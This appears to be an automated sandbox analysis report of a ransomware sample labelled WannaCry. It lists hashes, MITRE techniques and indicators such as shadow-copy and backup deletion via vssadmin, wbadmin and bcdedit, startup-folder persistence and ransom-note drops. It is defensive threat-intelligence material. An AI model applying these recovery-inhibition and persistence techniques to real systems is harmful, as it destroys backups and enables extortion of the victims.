ab1ead6628df92a6cf9e0aee75bdf3ad9e7bf7e9067baf2a5a83adbf4cfd5d02

Analysis

max time kernel
151s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
28-04-2024 03:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
Size

987KB
MD5

7f3607674f31dd96e4d6a009cb4dfb7e
SHA1

5ebce6ec9924dc24e73a1faef6934128ea46c28c
SHA256

ab1ead6628df92a6cf9e0aee75bdf3ad9e7bf7e9067baf2a5a83adbf4cfd5d02
SHA512

68e0aff21d3ee5d24794c1d46f5a13fdc6af63f299ff175f74f89443b7edbcf09f7a96fdd43d64ed44e8336f37bfdc1c1806a2103846bbb2e14593fc0a125c06
SSDEEP

12288:ut3UkyTa5ziXxqf8FLpqf77yAJKrMCLSoJjvN+MyjLvBG1YJX8ORnu:TkbsLpqDuA7E3cRnu

Score

9^/10

evasion ransomware spyware stealer

Malware Config

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Detects binaries and memory artifacts referencing sandbox DLLs typically observed in sandbox evasion 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4832-0-0x00000000002C0000-0x00000000003BC000-memory.dmp	INDICATOR_SUSPICIOUS_EXE_SandboxHookingDLL

Detects command variations typically used by ransomware 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4832-0-0x00000000002C0000-0x00000000003BC000-memory.dmp	INDICATOR_SUSPICIOUS_GENRansomware

Detects executables containing many references to VEEAM. Observed in ransomware 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4832-0-0x00000000002C0000-0x00000000003BC000-memory.dmp	INDICATOR_SUSPICOUS_EXE_References_VEEAM

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
ransomware evasion

Inhibit System Recovery
T1490

Processes:

bcdedit.exebcdedit.exe

pid process

4168 bcdedit.exe
3916 bcdedit.exe
Deletes System State backups 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

2128 wbadmin.exe
Deletes backup catalog 3 TTPs 1 IoCs
Uses wbadmin.exe to inhibit system recovery.
ransomware

Command and Scripting Interpreter
T1059

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

wbadmin.exe

pid process

3308 wbadmin.exe
Disables Task Manager via registry modification
evasion
Modifies Windows Firewall 2 TTPs 2 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exenetsh.exe

pid process

2224 netsh.exe
1236 netsh.exe

pid	process
4168	bcdedit.exe
3916	bcdedit.exe

pid	process
2128	wbadmin.exe

pid	process
3308	wbadmin.exe

pid	process
2224	netsh.exe
1236	netsh.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

Drops startup file 7 IoCs

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinLogonCmd.bat	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zebra..y2g42s	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinLogonCmd.bat	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\zebra..y2g42s	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Drops desktop.ini file(s) 20 IoCs

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

description	ioc	process
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\OneDrive\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	F:\$RECYCLE.BIN\S-1-5-21-3808065738-1666277613-1125846146-1000\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Pictures\Camera Roll\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Pictures\Saved Pictures\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\$Recycle.Bin\S-1-5-21-3808065738-1666277613-1125846146-1000\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Users\Admin\3D Objects\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

label.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exelabel.exe

description	ioc	process
File opened (read-only)	\??\I:	label.exe
File opened (read-only)	\??\K:	label.exe
File opened (read-only)	\??\Y:	label.exe
File opened (read-only)	\??\M:	label.exe
File opened (read-only)	\??\T:	label.exe
File opened (read-only)	\??\Z:	label.exe
File opened (read-only)	\??\L:	label.exe
File opened (read-only)	\??\S:	label.exe
File opened (read-only)	\??\G:	label.exe
File opened (read-only)	\??\Q:	label.exe
File opened (read-only)	\??\X:	label.exe
File opened (read-only)	\??\B:	label.exe
File opened (read-only)	\??\N:	label.exe
File opened (read-only)	\??\P:	label.exe
File opened (read-only)	\??\V:	label.exe
File opened (read-only)	\??\A:	label.exe
File opened (read-only)	\??\D:	label.exe
File opened (read-only)	\??\H:	label.exe
File opened (read-only)	\??\W:	label.exe
File opened (read-only)	\??\E:	label.exe
File opened (read-only)	\??\J:	label.exe
File opened (read-only)	\??\R:	label.exe
File opened (read-only)	\??\F:	label.exe
File opened (read-only)	\??\O:	label.exe
File opened (read-only)	\??\U:	label.exe

Drops file in Program Files directory 64 IoCs

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

description	ioc	process
File opened for modification	C:\Program Files\MoveBlock.jpeg	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\tr.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-file-l1-2-0.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\ApiClient.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp120.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ko.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\ServiceWatcherSchedule.xml	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\eu.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kk.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sq.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sr-latn-rs.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcr120.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\readme.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\fr.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hu.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.ko-kr.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\msvcp140.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RCom.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\SendSkip.sql	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File created	C:\Program Files\7-Zip\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\hi.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVIsvApi.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.lt-lt.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\!HELP FILES ENCRYPTED!.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.ja-jp.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.kk-kz.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ru.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\7zCon.sfx	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\cs.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\lij.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ug.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVPolicy.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.zh-tw.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\MoveSearch.mpeg2	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ne.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sv.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\SetLock.001	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\mn.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pl.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-crt-time-l1-1-0.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\i640.hash	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\co.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.pl-pl.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\kab.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\sl.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\desktop.ini	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\InitializeDebug.mp2	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\7-zip32.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.nb-no.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\C2RINTL.sv-se.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\Common Files\microsoft shared\ClickToRun\api-ms-win-core-localization-l1-2-0.dll	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\History.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\be.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\bn.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\el.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ps.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\7-Zip\Lang\pt-br.txt	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
File opened for modification	C:\Program Files\PushSelect.001	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

Drops file in Windows directory 3 IoCs

Processes:

wbadmin.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.3.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.2.etl	wbadmin.exe
File opened for modification	C:\Windows\Logs\WindowsBackup\WBEngine.1.etl	wbadmin.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 4 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

vds.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	vds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000	vds.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName	vds.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1568 schtasks.exe
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Processes:

vssadmin.exe

pid process

4652 vssadmin.exe

pid	process
1568	schtasks.exe

pid	process
4652	vssadmin.exe

Modifies registry class 1 IoCs

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

Suspicious behavior: EnumeratesProcesses 29 IoCs

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

pid	process
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exevssvc.exeWMIC.exewbengine.exeWMIC.exe

description	pid	process
Token: SeDebugPrivilege	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
Token: SeDebugPrivilege	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe
Token: SeBackupPrivilege	2428	vssvc.exe
Token: SeRestorePrivilege	2428	vssvc.exe
Token: SeAuditPrivilege	2428	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3164	WMIC.exe
Token: SeSecurityPrivilege	3164	WMIC.exe
Token: SeTakeOwnershipPrivilege	3164	WMIC.exe
Token: SeLoadDriverPrivilege	3164	WMIC.exe
Token: SeSystemProfilePrivilege	3164	WMIC.exe
Token: SeSystemtimePrivilege	3164	WMIC.exe
Token: SeProfSingleProcessPrivilege	3164	WMIC.exe
Token: SeIncBasePriorityPrivilege	3164	WMIC.exe
Token: SeCreatePagefilePrivilege	3164	WMIC.exe
Token: SeBackupPrivilege	3164	WMIC.exe
Token: SeRestorePrivilege	3164	WMIC.exe
Token: SeShutdownPrivilege	3164	WMIC.exe
Token: SeDebugPrivilege	3164	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3164	WMIC.exe
Token: SeRemoteShutdownPrivilege	3164	WMIC.exe
Token: SeUndockPrivilege	3164	WMIC.exe
Token: SeManageVolumePrivilege	3164	WMIC.exe
Token: 33	3164	WMIC.exe
Token: 34	3164	WMIC.exe
Token: 35	3164	WMIC.exe
Token: 36	3164	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3164	WMIC.exe
Token: SeSecurityPrivilege	3164	WMIC.exe
Token: SeTakeOwnershipPrivilege	3164	WMIC.exe
Token: SeLoadDriverPrivilege	3164	WMIC.exe
Token: SeSystemProfilePrivilege	3164	WMIC.exe
Token: SeSystemtimePrivilege	3164	WMIC.exe
Token: SeProfSingleProcessPrivilege	3164	WMIC.exe
Token: SeIncBasePriorityPrivilege	3164	WMIC.exe
Token: SeCreatePagefilePrivilege	3164	WMIC.exe
Token: SeBackupPrivilege	3164	WMIC.exe
Token: SeRestorePrivilege	3164	WMIC.exe
Token: SeShutdownPrivilege	3164	WMIC.exe
Token: SeDebugPrivilege	3164	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3164	WMIC.exe
Token: SeRemoteShutdownPrivilege	3164	WMIC.exe
Token: SeUndockPrivilege	3164	WMIC.exe
Token: SeManageVolumePrivilege	3164	WMIC.exe
Token: 33	3164	WMIC.exe
Token: 34	3164	WMIC.exe
Token: 35	3164	WMIC.exe
Token: 36	3164	WMIC.exe
Token: SeBackupPrivilege	3284	wbengine.exe
Token: SeRestorePrivilege	3284	wbengine.exe
Token: SeSecurityPrivilege	3284	wbengine.exe
Token: SeIncreaseQuotaPrivilege	3252	WMIC.exe
Token: SeSecurityPrivilege	3252	WMIC.exe
Token: SeTakeOwnershipPrivilege	3252	WMIC.exe
Token: SeLoadDriverPrivilege	3252	WMIC.exe
Token: SeSystemProfilePrivilege	3252	WMIC.exe
Token: SeSystemtimePrivilege	3252	WMIC.exe
Token: SeProfSingleProcessPrivilege	3252	WMIC.exe
Token: SeIncBasePriorityPrivilege	3252	WMIC.exe
Token: SeCreatePagefilePrivilege	3252	WMIC.exe
Token: SeBackupPrivilege	3252	WMIC.exe
Token: SeRestorePrivilege	3252	WMIC.exe
Token: SeShutdownPrivilege	3252	WMIC.exe
Token: SeDebugPrivilege	3252	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3252	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4832 wrote to memory of 5028	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 4832 wrote to memory of 5028	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	cmd.exe
PID 5028 wrote to memory of 332	5028	cmd.exe	attrib.exe
PID 5028 wrote to memory of 332	5028	cmd.exe	attrib.exe
PID 4832 wrote to memory of 1568	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	schtasks.exe
PID 4832 wrote to memory of 1568	4832	2024-04-28_7f3607674f31dd96e4d6a009cb4dfb7e_wannacry.exe	schtasks.exe
